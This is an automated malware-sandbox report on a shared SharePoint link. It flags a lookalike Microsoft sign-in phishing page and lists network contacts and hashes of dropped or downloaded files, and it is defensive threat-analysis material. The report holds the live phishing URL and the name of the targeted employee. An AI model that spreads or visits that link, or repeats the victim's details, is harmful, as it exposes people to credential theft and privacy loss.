                                                  188.114.97.3
                                                  unknownEuropean Union
                                                  13335CLOUDFLARENETUSfalse
                                                  188.114.96.3
                                                  ponnet.msk.suEuropean Union
                                                  13335CLOUDFLARENETUStrue
                                                  23.38.98.68
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  13.107.3.254
                                                  unknownUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  13.69.116.107
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  IP
                                                  192.168.2.16
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1512448
                                                  Start date and time:2024-09-17 13:53:47 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Sample URL:https://hidrotehnik-my.sharepoint.com/:f:/g/personal/urska_zupanc-lasic_hidrotehnik_si/Epu6BB7ILDFNjIQbbTEGSdMBLt3x-_NWBd96WDl7UarhTQ?e=idcQMg
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:5
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  Analysis Mode:stream
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal72.phis.win@14/243@62/132
                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.184.206, 74.125.71.84
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • VT rate limit hit for: https://hidrotehnik-my.sharepoint.com/:f:/g/personal/urska_zupanc-lasic_hidrotehnik_si/Epu6BB7ILDFNjIQbbTEGSdMBLt3x-_NWBd96WDl7UarhTQ?e=idcQMg
                                                  InputOutput
                                                  URL: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/ Model: jbxai
                                                  {
                                                  "brand":["Microsoft"],
                                                  "contains_trigger_text":false,
                                                  "prominent_button_name":"Next",
                                                  "text_input_field_labels":["Sign in",
                                                  "E-mail,
                                                   phone,
                                                   or Skype",
                                                  "No account? Create one! Can't access your account?"],
                                                  "pdf_icon_visible":false,
                                                  "has_visible_captcha":false,
                                                  "has_urgent_text":false,
                                                  "has_visible_qrcode":false}
                                                  URL: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/ Model: jbxai
                                                  {
                                                  "phishing_score":10,
                                                  "brands":["Microsoft"],
                                                  "sub_domain":"payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si",
                                                  "legit_domain":"dynamictooilngsolutionsinc.com",
                                                  "partial_domain_match":true,
                                                  "brand_matches_associated_domain":false,
                                                  "reasons":"The URL does not match the legitimate domain name associated with Microsoft,
                                                   and the domain 'dynamictooilngsolutionsinc.com' is not associated with Microsoft. The presence of a sign-in form and the 'Next' button suggests that the webpage is designed to trick users into entering their login credentials.",
                                                  "brand_matches":[false],
                                                  "url_match":false}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 17 10:55:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2673
                                                  Entropy (8bit):3.983182243917007
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FE802B335B8869E9C71EA40688396D29
                                                  SHA1:AE089D486CD44299474B48541AF04701A5499DAD
                                                  SHA-256:38873AD8C6763EC1528FA1C03798997A9BCB0336C1134794C9CCD600ECB960AD
                                                  SHA-512:A32FCD092469E281645A479347743A799697ADDE716529426A301C5A68D62A649C529D4B443F1CAFBC60C2C98238A66B8BBFF20D98A86AA08EB2C76B288CA5B2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,....29.w....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Y.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Y.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Y.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........8.S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 17 10:55:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2675
                                                  Entropy (8bit):4.002719125400925
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3C6A947C3C0CE018B06DAF7090BB56D3
                                                  SHA1:0A7C5025EB9B323F155C28C54EA9FD6008E5818B
                                                  SHA-256:AC1CFFE79450C9B8CF50F31998438D8414491215CE13E0FB4BAA93AB6A512897
                                                  SHA-512:05A04194536104A8149D7AAA3B043328A0CC9C3A702F0A5F0653C3B8C732E19BA9E416CBCEF6AF11692691D8CCDD7C132FAEBA52CBE981ECCE72DEFA4672C6FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.......w....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Y.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Y.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Y.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........8.S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2689
                                                  Entropy (8bit):4.0077729377510245
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:74995ABA5E7B56D2BA4180C26B4DFE70
                                                  SHA1:3EBE8328C05E752F40F2F92CAA6324992F3F7656
                                                  SHA-256:7D2D848802107B3005174A4D68C9C5C438E418BC32C07FA41AE3171372052855
                                                  SHA-512:D38E81F8B200B630D953D04803BF706B50DAC708DF3EB5B123F181F34EDB33B6E2837C94806820FFF98EAB3DDA224364238BF216A00B9E0E0DC0BEA6F6819CEF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Y.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Y.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........8.S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 17 10:55:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2677
                                                  Entropy (8bit):3.9979026115456224
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D1CEAE2606E9112332ED49693FCBCD8A
                                                  SHA1:681FC4802C62B55BB88A7B0963E8C9E517D59E2E
                                                  SHA-256:76FAE331DDBC086C2F37FDE78DAD10CCF4B7709EB12BB9938B717B052C52EB03
                                                  SHA-512:6EC8A6810ED637CC028290B3EB13007A51C8D8E2FD4B4EB0B619E693DF7E9953DC9F96C699CE58FF64D8DA23225A2AE80766C2875553475E816965FF8FBBC1DD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,....+.~w....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Y.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Y.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Y.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........8.S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 17 10:55:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2677
                                                  Entropy (8bit):3.987769916615847
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:200FC2CA3B5A49ADDC9800310E71D176
                                                  SHA1:D3AC183427D5BE7400305CEF61FB5EDF9A83F62D
                                                  SHA-256:8909F12952B3961036FF285E2C4DBCC879F3DF626918C904D2F5AAF8C25F2BE0
                                                  SHA-512:2458075B6693129C8C0FBF0C5EB2786C7847736B3B29D264D26CBF5FA871F8154BBB32B8E6781028682793BB1E045F9B6C1DA55FBA2C440AC3C4A03C98932328
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.....w....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Y.^....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Y.^....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Y.^....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Y.^..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Y.^...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........8.S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/>), ASCII text
                                                  Category:dropped
                                                  Size (bytes):118
                                                  Entropy (8bit):4.610776229516927
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DFA37D9ECAAF682A5AE2ABF94FED6B24
                                                  SHA1:9970F243ACF8883A78E813AA4375889A229B4C1F
                                                  SHA-256:BA04A9CE3594D756500BE88B54DB0B541302B9B54EC5AC27742ECEC9B077A038
                                                  SHA-512:3D9E68B30C21B109F028C0A370CBDFBA943199E0566E8AFE648050F9942F305E333709B6C12339EA4B9EF6317B7B3252BBDF1D7EA9CC8D74EB25B66AAD46D378
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:[InternetShortcut].URL=https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/>), ASCII text
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DFA37D9ECAAF682A5AE2ABF94FED6B24
                                                  SHA1:9970F243ACF8883A78E813AA4375889A229B4C1F
                                                  SHA-256:BA04A9CE3594D756500BE88B54DB0B541302B9B54EC5AC27742ECEC9B077A038
                                                  SHA-512:3D9E68B30C21B109F028C0A370CBDFBA943199E0566E8AFE648050F9942F305E333709B6C12339EA4B9EF6317B7B3252BBDF1D7EA9CC8D74EB25B66AAD46D378
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:[InternetShortcut].URL=https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3467)
                                                  Category:downloaded
                                                  Size (bytes):3472
                                                  Entropy (8bit):4.2818504787682885
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:050FC4D38D98FA520FEEF474362F4FB4
                                                  SHA1:48F6FF6B25144AAA39FD244D2218AF384EA76B89
                                                  SHA-256:AD9EC7AC11B18EE8045398734A7B3A1FDF96141B6218C75513FE6B6903CFD23C
                                                  SHA-512:485855BC2E20DC7823204DB7952249F73AB95BB92B5B0A87A70E7EFB17F1BB469000C836EDDE5AC32D21F8B0C9B641A8FC48EAD533BA3960ED21D3E9EBE77533
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/98775.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[98775],{898775:(e,t,n)=>{n.d(t,{CTZ:()=>r,EAw:()=>s,LEV:()=>o,iLd:()=>c,sIJ:()=>i});var a=n(875427);const i=(0,a.k)("Replay20Regular","20",["M3 6.5v-3a.5.5 0 0 1 1 0v1.2a7.98 7.98 0 0 1 7.94-2.46A8 8 0 1 1 2 9.48a.5.5 0 1 1 1 .07A6.97 6.97 0 0 0 3 10a7 7 0 1 0 1.25-4H6a.5.5 0 0 1 0 1H3.5a.5.5 0 0 1-.5-.5Zm4.5 1.47c0-.93.98-1.54 1.81-1.12l4.04 2.03c.92.47.92 1.77 0 2.24l-4.04 2.03a1.25 1.25 0 0 1-1.81-1.12V7.97Zm1.36-.23a.25.25 0 0 0-.36.23v4.06c0 .19.2.31.36.23l4.04-2.04a.25.25 0 0 0 0-.44L8.86 7.74Z"]),r=(0,a.k)("Settings20Regular","20",["M1.91 7.38A8.5 8.5 0 0 1 3.7 4.3a.5.5 0 0 1 .54-.13l1.92.68a1 1 0 0 0 1.32-.76l.36-2a.5.5 0 0 1 .4-.4 8.53 8.53 0 0 1 3.55 0c.2.04.35.2.38.4l.37 2a1 1 0 0 0 1.32.76l1.92-.68a.5.5 0 0 1 .54.13 8.5 8.5 0 0 1 1.78 3.08c.06.2 0 .4-.15.54l-1.56 1.32a1 1 0 0 0 0 1.52l1.56 1.32a.5.5 0 0 1 .15.54 8.5 8.5 0 0 1-1.78 3.08.5.5 0 0 1-.54.13l-1.92-.68a1 1 0 0 0-1.32.76
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7103)
                                                  Category:downloaded
                                                  Size (bytes):923109
                                                  Entropy (8bit):5.444351128586379
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9F60BFCF3BFC90B18557F9E97F69BA0C
                                                  SHA1:E691EC6E202DE0C00F1A42A29ECFE310628DB3ED
                                                  SHA-256:D5FEE50B6B45C40F7DA426248FC05E599B4D6AD53912A4E9769F2D9E2445C7F6
                                                  SHA-512:1D7FE6F92872CF45F7816B590296745673AD1C0CB5CD95BD89DA2713D9D07750957C7121A9A461488149677797B0FF5748CE15B0D2F4AC2D4285FC82F88C9BD9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/395.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[395,217,1283,2175,1064,468],{2637:function(e,t,n){n.r(t),n.d(t,{abbreviateNumberToShortString:function(){return a.jG},capitalize:function(){return a.SD},countFormatArguments:function(){return a.BU},decapitalize:function(){return a.gi},doesStringEndWith:function(){return a.km},doesStringStartWith:function(){return a.$2},equalsCaseInsensitive:function(){return a.dj},findOneOf:function(){return a.Ii},format:function(){return a.OO},formatToArray:function(){return a.ni},formatWithLouserzedCountValue:function(){return a.Gx},getLouserzedCountValue:function(){return a.Ot},leftPad:function(){return a.em},localeStringMatch:function(){return a.dQ},padData:function(){return a.y2},pluralSelect:function(){return a.KQ},repeat:function(){return a.S9},replaceAll:function(){return a.t9},rightPad:function(){return a.jX}});var a=n("odsp.util_460")}.,2766:function(e,t,n){n.d(t,{a:function(){return h},b:function(){return _},c:func
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):5226128
                                                  Entropy (8bit):5.937237623469276
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E721FE49377587B32770512CD82B1254
                                                  SHA1:490F01BF24E389668FD6C3DEBB2E6EFE1874484E
                                                  SHA-256:3AD116002788910647866CA9EA23155C1CAD941A8EA10F367492339B6ABAF84E
                                                  SHA-512:6139815F715CFB9410C6C0EE065E70A51EC2F2B86B5365BBE1BF58537A25FEEC10EDE3B0C3D540ABC94BCBE898D07386AC209893D6E1BAD68F292A951E5EE667
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://hidrotehnik-my.sharepoint.com/_layouts/15/SPComponentRegistry.ashx?projects=[%22STS%22]&languages=%5B%5D
                                                  Preview:{"sts":{"en-US":{"SPLIST":{"scriptPathData":{"aria-mini":"aria-mini-b1d3eb2e","customformatter-mini":"customformatter-mini-fcd00133","customformatter-mini.resx":"en-us/customformatter-mini.resx-3573f52d","roostereditor-mini":"roostereditor-mini-4998463d","roostereditor-mini.resx":"en-us/roostereditor-mini.resx-cb522433","spectreviewer-mini":"spectreviewer-mini-ce4e101e","babylonjs-mini":"babylonjs-mini-2fecff8d","reactandknockout-mini":"reactandknockout-mini-38b94816","listviewdataprefetch-mini":"listviewdataprefetch-mini-2f73ea81","splistreactcontrolsdeferred-mini":"splistreactcontrolsdeferred-mini-7a71c298","splistreactcontrolsdeferred-mini.resx":"en-us/splistreactcontrolsdeferred-mini.resx-9f5d2dc4","splistreactcontrolsbeforeplt-mini":"splistreactcontrolsbeforeplt-mini-04fb8d49","splistreactcontrolsbeforeplt-mini.resx":"en-us/splistreactcontrolsbeforeplt-mini.resx-ed5726fd","splistapp-mini":"splistapp-mini-27747d47","splistapp-mini.resx":"en-us/splistapp-mini.resx-50f4529c","splistf
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (65471)
                                                  Category:downloaded
                                                  Size (bytes):427548
                                                  Entropy (8bit):5.349338791756901
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4100EC2D6D7816E2532B5AB2E20D6AA0
                                                  SHA1:B8E040B4A2428AB0C0FA9002287B0A43DA906D36
                                                  SHA-256:A123A739279167325B3854788804ED55F486C667C66D61B0B9F7FA6D6E290B97
                                                  SHA-512:974F0DEEC20AD5E7E8F8DC759758095581BA4BC74EC731298EA604B712D0C5F368BF12CDFD5ADBDC92D7D25BEDB6E28D105549C034C8BC612787613DAFE0D1F6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/43044.js
                                                  Preview:/*! For license information please see 43044.js.LICENSE.txt */.(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[43044],{243044:(e,t)=>{!function(){var e="undefined"!=typeof window?window:global,n={};for(var a in function(e,t,n){var a;function i(e){var t=0;return function(){return t<e.length?{done:!1,value:e[t++]}:{done:!0}}}var r="function"==typeof Object.defineProperties?Object.defineProperty:function(e,t,n){return e==Array.prototype||e==Object.prototype||(e[t]=n.value),e},o=function(n){n=["object"==typeof globalThis&&globalThis,n,"object"==typeof e&&e,"object"==typeof self&&self,"object"==typeof t&&t];for(var a=0;a<n.length;++a){var i=n[a];if(i&&i.Math==Math)return i}throw Error("Cannot find global object")}(this);function s(e,t){if(t)e:{var n=o;e=e.split(".");for(var a=0;a<e.length-1;a++){var i=e[a];if(!(i in n))break e;n=n[i]}(t=t(a=n[e=e[e.length-1]]))!=a&&null!=t&&r(n,e,{configurable:!0,writable:!0,value:t})}}function c(e){return(e={next:e})[Symb
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (30298)
                                                  Category:dropped
                                                  Size (bytes):139002
                                                  Entropy (8bit):5.38198186448589
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2BC3648F33DB1588A78F81D6E4D993C6
                                                  SHA1:A7B8AA25FDE53376CE3992D50CF881E3B009DE6C
                                                  SHA-256:A9F7AD334511E2515A1E9836C66E0472B4173018EA12FAABD8560101844DC128
                                                  SHA-512:A7F75E29E55C20714214DECA85B2EA2B8BB99DA5A2CF387A94926FDB364FF05E0A36B03CC947B51DBE9F06068709BF1EF08630E26188578DDFA08B476DB92452
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_mast_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["mast"],{69691:function(n,t,e){var r=e(92855),i=e(41230),o=e(54800),u=e(59177),a=e(68128),c=e(78939),s=e(85788),l=e(69988),f=e(25855),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=l.S);var f=e.propertyStorageOverride;!f||f.getProperty&&f.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,(function(n){i
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):19995
                                                  Entropy (8bit):4.18417172948625
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1E633D46AC979AB4316B5427BD328527
                                                  SHA1:0391F135924813ECAD623F5543E5E71E4FC23851
                                                  SHA-256:F7E06F07ACC7A46215319570019C1483170B8FE36A58D35D2A9A92F382DF679F
                                                  SHA-512:9B11B20D49E26983F510B666F417B88BFEBDB9740E4CAD401739B05689A6EDBC283227C19A2A125D95AD7F62E83E1F09FF0A6975BDCABA21335E9A76F88CBF6F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_sharedwithme_dark.svg
                                                  Preview:<svg width="220" height="220" viewBox="0 0 220 220" fill="none" xmlns="http://www.w3.org/2000/svg">..<path opacity="0.2" d="M169.427 169.965C220 164.994 227.995 73.5033 204.22 41.8942C142.259 -40.5011 124.675 38.3245 65.1534 12.7643C28.8745 -2.8134 -15.2577 48.7713 37.9929 86.313C67.2063 106.908 37.9537 102.907 16.2213 118.614C-5.12184 134.038 12.4602 157.3 42.3759 165.974C74.149 175.186 135.541 173.298 169.427 169.965Z" fill="#797673"/>..<path d="M139.255 103.699L122.341 67.209C121.987 66.5275 121.442 65.9643 120.772 65.5885C120.103 65.2126 119.338 65.0406 118.572 65.0936L82.9512 69.1223L82.4584 68.2709L81.0527 65.8456C80.7327 65.3527 80.2875 64.9536 79.7627 64.6891C79.2379 64.4247 78.6523 64.3044 78.0658 64.3405L73.3273 64.8768L62.8561 66.0603C62.5462 66.0578 62.2414 66.1406 61.9753 66.2995C61.7091 66.4584 61.4917 66.6873 61.3467 66.9614C61.2018 67.2354 61.1349 67.544 61.1534 67.8535C61.1719 68.1629 61.275 68.4613 61.4515 68.7162L64.9102 75.3067L81.1183 110.278C81.5193 111.065 82.181
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (42917)
                                                  Category:dropped
                                                  Size (bytes):211436
                                                  Entropy (8bit):5.52724531792186
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:64AD5C4B241F36ABCC01FAF50AAFD996
                                                  SHA1:348A224B1789885A56183F2E6294B87467EFC477
                                                  SHA-256:6FB13321BA734C66974274D0D682C53F3E1451F9E6FF74514606C12B3197EDFF
                                                  SHA-512:E332BE7151291F1C0F5E472561A050D07661824FD5B0F777BFD540D48B6F93F1C00BD4B573C007C36AA2884D5506DE40B7648B1324553AC4109CEA2CEDA438B2
                                                  Malicious:false
                                                  Reputation:unknown
